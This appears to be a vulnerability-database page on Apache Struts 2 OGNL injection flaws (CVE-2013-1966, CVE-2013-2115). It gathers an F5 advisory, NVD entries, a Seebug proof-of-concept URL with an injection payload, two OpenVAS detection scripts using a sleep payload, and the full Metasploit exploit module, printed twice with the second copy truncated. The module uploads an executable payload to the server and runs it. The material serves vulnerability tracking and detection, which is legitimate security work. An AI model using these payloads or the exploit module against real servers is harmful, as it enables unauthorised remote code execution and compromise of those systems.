Apache has already released a security advisory (S2-014) and a corresponding patch for this issue:
S2-014: A vulnerability introduced by forcing parameter inclusion in the URL and Anchor Tag allows remote command execution, session access and manipulation and XSS attacks
Link: https://cwiki.apache.org/confluence/display/WW/S2-014
{"f5": [{"lastseen": "2017-06-08T00:16:02", "bulletinFamily": "software", "cvelist": ["CVE-2013-1966", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135"], "edition": 1, "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable| None \nBIG-IP WebSafe| None| 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| 
None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.0.2| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2017-02-10T04:50:00", "published": "2017-02-09T01:52:00", "href": "https://support.f5.com/csp/article/K10506844", "id": "F5:K10506844", "title": "Apache Struts 2 vulnerabilities CVE-2013-1966, CVE-2013-2115, CVE-2013-2134, and CVE-2013-2135", "type": "f5", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2020-12-09T19:52:40", "description": "Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag.", "edition": 7, "cvss3": {}, "published": "2013-07-10T19:55:00", "title": "CVE-2013-1966", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1966"], "modified": "2019-08-12T21:15:00", "cpe": [], "id": "CVE-2013-1966", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1966", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2020-12-09T19:52:40", "description": "Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966.", "edition": 6, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2013-07-10T19:55:00", "title": "CVE-2013-2115", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2115"], "modified": "2020-09-24T13:28:00", "cpe": ["cpe:/a:apache:struts:2.3.14.1"], "id": "CVE-2013-2115", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2115", "cvss": {"score": 9.3, 
"vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apache:struts:2.3.14.1:*:*:*:*:*:*:*"]}], "seebug": [{"lastseen": "2017-11-19T17:42:34", "description": "No description provided by source.", "published": "2013-05-24T00:00:00", "title": "Apache Struts2 includeParams\u5c5e\u6027\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e(CVE-2013-1966)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1966"], "modified": "2013-05-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60807", "id": "SSV:60807", "sourceData": "\n \u6253\u5f00Struts Blank App\u4e2d\u7684 HelloWorld.jsp\u589e\u52a0\u7c7b\u4f3c\u4e0b\u5217\u4ee3\u7801\uff1a\r\n\r\n<s:url id="url" action="HelloWorld" includeParams="all">\r\n\r\n\u8fd0\u884c struts2-blank app\r\n\r\n\u8bbf\u95ee\u4e0b\u5217\u5730\u5740: http://localhost:8080/example/HelloWorld.action?fakeParam=%25%7B(%23_memberAccess%5B'allowStaticMethodAccess'%5D%3Dtrue)(%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse)(%23writer%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23writer.println('hacked')%2C%23writer.close())%7D\r\n\r\n\u5982\u679c\u8fd4\u56de"hacked"\uff0c\u5219\u53d7\u6b64\u6f0f\u6d1e\u5f71\u54cd\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-60807"}], "openvas": [{"lastseen": "2018-01-15T13:08:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "description": "This host is running Apache Struts2 and\n is prone to arbitrary java method execution vulnerabilities.", "modified": "2018-01-11T00:00:00", "published": "2013-07-23T00:00:00", "id": "OPENVAS:803837", "href": "http://plugins.openvas.org/nasl.php?oid=803837", "type": "openvas", "title": "Apache Struts2 'URL' & 'Anchor' tags Arbitrary Java Method Execution Vulnerabilities", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts2_java_method_exec_vuln.nasl 8373 2018-01-11 10:29:41Z cfischer $\n#\n# Apache Struts2 'URL' & 'Anchor' tags Arbitrary Java Method Execution Vulnerabilities\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_id(803837);\n script_version(\"$Revision: 8373 $\");\n script_cve_id(\"CVE-2013-1966\", \"CVE-2013-2115\");\n script_bugtraq_id(60166, 60167);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-11 11:29:41 +0100 (Thu, 11 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-07-23 17:54:59 +0530 (Tue, 23 Jul 2013)\");\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_name(\"Apache Struts2 'URL' & 'Anchor' tags Arbitrary Java Method Execution Vulnerabilities\");\n\n script_tag(name: \"summary\" , value:\"This host is running Apache Struts2 and\n is prone to 
arbitrary java method execution vulnerabilities.\");\n\n script_tag(name: \"vuldetect\" , value:\"Send a crafted data like system functions\n via HTTP POST request and check whether it is executing the java function or not.\");\n\n script_tag(name: \"insight\" , value:\"Flaw is due to improper handling of the\n includeParams attribute in the URL and Anchor tags\");\n\n script_tag(name: \"impact\" , value:\"Successful exploitation will allow remote attackers\n to execute arbitrary commands via specially crafted OGNL (Object-Graph Navigation Language)\n expressions.\n\n Impact Level: Application\");\n\n script_tag(name: \"affected\" , value:\"Apache Struts 2 before 2.3.14.2\");\n\n script_tag(name: \"solution\" , value:\"Upgrade to Apache Struts 2 version 2.3.14.2 or later,\n For updates refer to http://struts.apache.org\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/53553\");\n script_xref(name : \"URL\" , value : \"http://www.exploit-db.com/exploits/25980\");\n script_xref(name : \"URL\" , value : \"https://cwiki.apache.org/confluence/display/WW/S2-013\");\n script_xref(name : \"URL\" , value : \"http://struts.apache.org/development/2.x/docs/s2-014.html\");\n script_xref(name : \"URL\" , value : \"http://metasploit.org/modules/exploit/multi/http/struts_include_params\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\n## Variable Initialization\nasport = 0;\nasreq = \"\";\nasres = \"\";\nasRes = \"\";\nasReq = \"\";\ndir = \"\";\nurl = \"\";\n\nif(!asport = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = 
get_app_location(cpe:CPE, port:asport)){\n exit(0);\n}\n\nhost = http_host_name(port:asport);\n\n## Send and Receive the response\nasreq = http_get(item:string(dir,\"/example/HelloWorld.action\"), port:asport);\nasres = http_keepalive_send_recv(port:asport, data:asreq);\n\n## Confirm the application\nif(asres && \">Struts\" >< asres && \">English<\" >< asres)\n{\n sleep = make_list(3, 5);\n\n foreach i (sleep)\n {\n ## Construct the POST data\n postdata = \"fgoa=%24%7b%23%5fmemberAccess%5b%22allow\"+\n \"StaticMethodAccess%22%5d%3dtrue%2c%40jav\"+\n \"a.lang.Thread%40sleep%28\"+ i +\"000%29%7d\";\n\n ## Construct the POST request\n asReq = string(\"POST /struts2-blank/example/HelloWorld.action HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", OPENVAS_HTTP_USER_AGENT, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n\n start = unixtime();\n asRes = http_send_recv(port:asport, data:asReq);\n stop = unixtime();\n\n if(stop - start < i || stop - start > (i+5)) exit(0); # not vulnerable\n }\n security_message(port:asport);\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-05-12T17:27:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "description": "This host is running Apache Struts2 and\n is prone to arbitrary java method execution vulnerabilities.", "modified": "2020-05-08T00:00:00", "published": "2013-07-23T00:00:00", "id": "OPENVAS:1361412562310803837", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803837", "type": "openvas", "title": "Apache Struts2 'URL' & 'Anchor' tags Arbitrary Java Method Execution Vulnerabilities (S2-013, S2-014)", "sourceData": "# Copyright (C) 2013 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# 
modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803837\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2013-1966\", \"CVE-2013-2115\");\n script_bugtraq_id(60166, 60167);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-07-23 17:54:59 +0530 (Tue, 23 Jul 2013)\");\n script_name(\"Apache Struts2 'URL' & 'Anchor' tags Arbitrary Java Method Execution Vulnerabilities (S2-013, S2-014)\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"ApacheStruts/installed\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/53553\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/25980\");\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-013\");\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-014\");\n 
script_xref(name:\"URL\", value:\"http://metasploit.org/modules/exploit/multi/http/struts_include_params\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts2 and\n is prone to arbitrary java method execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted data like system functions\n via HTTP POST request and check whether it is executing the java function or not.\");\n\n script_tag(name:\"insight\", value:\"Flaw is due to improper handling of the\n includeParams attribute in the URL and Anchor tags\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers\n to execute arbitrary commands via specially crafted OGNL (Object-Graph Navigation Language)\n expressions.\");\n\n script_tag(name:\"affected\", value:\"Struts 2.0.0 - Struts 2.3.14.1.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to at least Struts 2.3.14.2.\");\n\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nif(!port = get_app_port(cpe:CPE, service:\"www\"))\n exit(0);\n\nif(!dir = get_app_location(cpe:CPE, port:port))\n exit(0);\n\nif(dir == \"/\")\n dir = \"\";\n\nuseragent = http_get_user_agent();\nhost = http_host_name(port:port);\n\nreq = http_get(item:dir + \"/example/HelloWorld.action\", port:port);\nres = http_keepalive_send_recv(port:port, data:req);\n\nif(res && \">Struts\" >< res && \">English<\" >< res)\n{\n sleep = make_list(3, 5);\n\n url = dir + \"/struts2-blank/example/HelloWorld.action\";\n foreach i (sleep)\n {\n postdata = \"fgoa=%24%7b%23%5fmemberAccess%5b%22allow\" +\n \"StaticMethodAccess%22%5d%3dtrue%2c%40jav\" +\n \"a.lang.Thread%40sleep%28\" + i + \"000%29%7d\";\n\n req = string(\"POST \", url, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", useragent, \"\\r\\n\",\n 
\"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n\n start = unixtime();\n http_send_recv(port:port, data:req);\n stop = unixtime();\n\n if(stop - start < i || stop - start > (i+5)) exit(99); # not vulnerable\n }\n report = http_report_vuln_url(port:port, url:url);\n security_message(port:port, data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-04-12T09:51:57", "edition": 2, "description": "This Metasploit module exploits a remote command execution vulnerability in Apache Struts versions prior to 2.3.14.2. A specifically crafted request parameter can be used to inject arbitrary OGNL code into the stack bypassing Struts and OGNL library protections. When targeting an action which requires interaction through GET the payload should be split having into account the uri limits. In this case, if the rendered jsp has more than one point of injection, it could result in payload corruption. It should happen only when the payload is larger than the uri length.", "published": "2013-06-03T00:00:00", "type": "zdt", "title": "Apache Struts includeParams Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "modified": "2013-06-03T00:00:00", "id": "1337DAY-ID-20837", "href": "https://0day.today/exploit/description/20837", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts includeParams Remote Code Execution',\r\n 'Description' => %q{\r\n This module exploits a remote command execution vulnerability in Apache Struts\r\n versions < 2.3.14.2. A specifically crafted request parameter can be used to inject\r\n arbitrary OGNL code into the stack bypassing Struts and OGNL library protections.\r\n When targeting an action which requires interaction through GET the payload should\r\n be split having into account the uri limits. In this case, if the rendered jsp has\r\n more than one point of injection, it could result in payload corruption. 
It should\r\n happen only when the payload is larger than the uri length.\r\n },\r\n 'Author' =>\r\n [\r\n # This vulnerability was also discovered by unknown members of:\r\n # 'Coverity security Research Laboratory'\r\n # 'NSFOCUS Security Team'\r\n 'Eric Kobrin', # Vulnerability Discovery\r\n 'Douglas Rodrigues', # Vulnerability Discovery\r\n 'Richard Hicks <scriptmonkey.blog[at]gmail.com>' # Metasploit Module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-2115'],\r\n [ 'CVE', '2013-1966'],\r\n [ 'OSVDB', '93645'],\r\n [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-014'],\r\n [ 'URL', 'http://struts.apache.org/development/2.x/docs/s2-013.html']\r\n ],\r\n 'Platform' => [ 'win', 'linux', 'java'],\r\n 'Privileged' => true,\r\n 'Targets' =>\r\n [\r\n ['Windows Universal',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n ['Linux Universal',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux'\r\n }\r\n ],\r\n [ 'Java Universal',\r\n {\r\n 'Arch' => ARCH_JAVA,\r\n 'Platform' => 'java'\r\n },\r\n ]\r\n ],\r\n 'DisclosureDate' => 'May 24 2013',\r\n 'DefaultTarget' => 2))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('PARAMETER',[ true, 'The parameter to use for the exploit (does not have to be an expected one).',rand_text_alpha_lower(4)]),\r\n OptString.new('TARGETURI', [ true, 'The path to a vulnerable struts application action', \"/struts2-blank/example/HelloWorld.action\"]),\r\n OptEnum.new('HTTPMETHOD', [ true, 'Which HTTP Method to use, GET or POST','POST', ['GET','POST']]),\r\n OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])\r\n ], self.class)\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n inject_string = @inject.gsub(/CMD/,cmd)\r\n uri = normalize_uri(target_uri.path)\r\n req_hash = {'uri' => uri, 'version' => '1.1', 'method' => datastore['HTTPMETHOD'] }\r\n case datastore['HTTPMETHOD']\r\n when 
'POST'\r\n req_hash.merge!({ 'vars_post' => { datastore['PARAMETER'] => inject_string }})\r\n when 'GET'\r\n req_hash.merge!({ 'vars_get' => { datastore['PARAMETER'] => inject_string }})\r\n end\r\n\r\n # Display a nice \"progress bar\" instead of message spam\r\n case @notify_flag\r\n when 0\r\n print_status(\"Performing HTTP #{datastore['HTTPMETHOD']} requests to upload payload\")\r\n @notify_flag = 1\r\n when 1\r\n print(\".\") # Progress dots\r\n when 2\r\n print_status(\"Payload upload complete\")\r\n end\r\n\r\n return send_request_cgi(req_hash) #Used for check function.\r\n end\r\n\r\n def exploit\r\n #initialise some base vars\r\n @inject = \"${#_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,CMD}\"\r\n @java_upload_part_cmd = \"#f=new java.io.FileOutputStream('FILENAME',APPEND),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('BUFFER')), #f.close()\"\r\n #Set up generic values.\r\n @payload_exe = rand_text_alphanumeric(4+rand(4))\r\n pl_exe = generate_payload_exe\r\n append = false\r\n #Now arch specific...\r\n case target['Platform']\r\n when 'linux'\r\n @payload_exe = \"/tmp/#{@payload_exe}\"\r\n chmod_cmd = \"@java.lang.Runtime@getRuntime().exec(\\\"/bin/sh_-c_chmod +x #{@payload_exe}\\\".split(\\\"_\\\"))\"\r\n exec_cmd = \"@java.lang.Runtime@getRuntime().exec(\\\"/bin/sh_-c_#{@payload_exe}\\\".split(\\\"_\\\"))\"\r\n when 'java'\r\n @payload_exe << \".jar\"\r\n pl_exe = payload.encoded_jar.pack\r\n exec_cmd = \"\"\r\n exec_cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),\"\r\n exec_cmd << \"#q.setAccessible(true),#q.set(null,true),\"\r\n exec_cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),\"\r\n exec_cmd << \"#q.setAccessible(true),#q.set(null,false),\"\r\n exec_cmd << \"#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),\"\r\n exec_cmd << \"#c=#cl.loadClass('metasploit.Payload'),\"\r\n exec_cmd << 
\"#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(\"\r\n exec_cmd << \"null,new java.lang.Object[]{new java.lang.String[0]})\"\r\n when 'windows'\r\n @payload_exe = \"./#{@payload_exe}.exe\"\r\n exec_cmd = \"@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')\"\r\n else\r\n fail_with(Exploit::Failure::NoTarget, 'Unsupported target platform!')\r\n end\r\n\r\n print_status(\"Preparing payload...\")\r\n # Now with all the arch specific stuff set, perform the upload.\r\n # Need to calculate amount to allocate for non-dynamic parts of the URL.\r\n # Fixed strings are tokens used for substitutions.\r\n append_length = append ? \"true\".length : \"false\".length # Gets around the boolean/string issue\r\n sub_from_chunk = append_length + ( @java_upload_part_cmd.length - \"FILENAME\".length - \"APPEND\".length - \"BUFFER\".length )\r\n sub_from_chunk += ( @inject.length - \"CMD\".length ) + @payload_exe.length + normalize_uri(target_uri.path).length + datastore['PARAMETER'].length\r\n case datastore['HTTPMETHOD']\r\n when 'GET'\r\n chunk_length = 2048 - sub_from_chunk # Using the max request length of 2048 for IIS, subtract all the \"static\" URL items.\r\n #This lets us know the length remaining for our base64'd payloads\r\n chunk_length = ((chunk_length/4).floor)*3\r\n when 'POST'\r\n chunk_length = 65535 # Just set this to an arbitrarily large value, as its a post request we don't care about the size of the URL anymore.\r\n end\r\n @notify_flag = 0\r\n while pl_exe.length > chunk_length\r\n java_upload_part(pl_exe[0,chunk_length],@payload_exe,append)\r\n pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length]\r\n append = true\r\n end\r\n java_upload_part(pl_exe,@payload_exe,append)\r\n execute_command(chmod_cmd) if target['Platform'] == 'linux'\r\n print_line() # new line character, after progress bar.\r\n @notify_flag = 2 # upload is complete, next command we're going to execute the uploaded file.\r\n 
execute_command(exec_cmd)\r\n register_files_for_cleanup(@payload_exe)\r\n end\r\n\r\n def java_upload_part(part, filename, append = false)\r\n cmd = @java_upload_part_cmd.gsub(/FILENAME/,filename)\r\n append = append ? \"true\" : \"false\" # converted for the string replacement.\r\n cmd = cmd.gsub!(/APPEND/,append)\r\n cmd = cmd.gsub!(/BUFFER/,Rex::Text.encode_base64(part))\r\n execute_command(cmd)\r\n end\r\n\r\n def check\r\n #initialise some base vars\r\n @inject = \"${#_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,CMD}\"\r\n print_status(\"Performing Check...\")\r\n sleep_time = datastore['CHECK_SLEEPTIME']\r\n check_cmd = \"@java.lang.Thread@sleep(#{sleep_time * 1000})\"\r\n t1 = Time.now\r\n print_status(\"Asking remote server to sleep for #{sleep_time} seconds\")\r\n response = execute_command(check_cmd)\r\n t2 = Time.now\r\n delta = t2 - t1\r\n\r\n\r\n if response.nil?\r\n return Exploit::CheckCode::Safe\r\n elsif delta < sleep_time\r\n return Exploit::CheckCode::Safe\r\n else\r\n return Exploit::CheckCode::Appears\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2018-04-12] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/20837"}], "exploitdb": [{"lastseen": "2016-02-03T02:35:14", "description": "Apache Struts - includeParams Remote Code Execution. CVE-2013-1966,CVE-2013-2115. Remote exploits for multiple platform", "published": "2013-06-05T00:00:00", "type": "exploitdb", "title": "Apache Struts - includeParams Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "modified": "2013-06-05T00:00:00", "id": "EDB-ID:25980", "href": "https://www.exploit-db.com/exploits/25980/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts includeParams Remote Code Execution',\r\n 'Description' => %q{\r\n This module exploits a remote command execution vulnerability in Apache Struts\r\n versions < 2.3.14.2. A specifically crafted request parameter can be used to inject\r\n arbitrary OGNL code into the stack bypassing Struts and OGNL library protections.\r\n When targeting an action which requires interaction through GET the payload should\r\n be split having into account the uri limits. In this case, if the rendered jsp has\r\n more than one point of injection, it could result in payload corruption. 
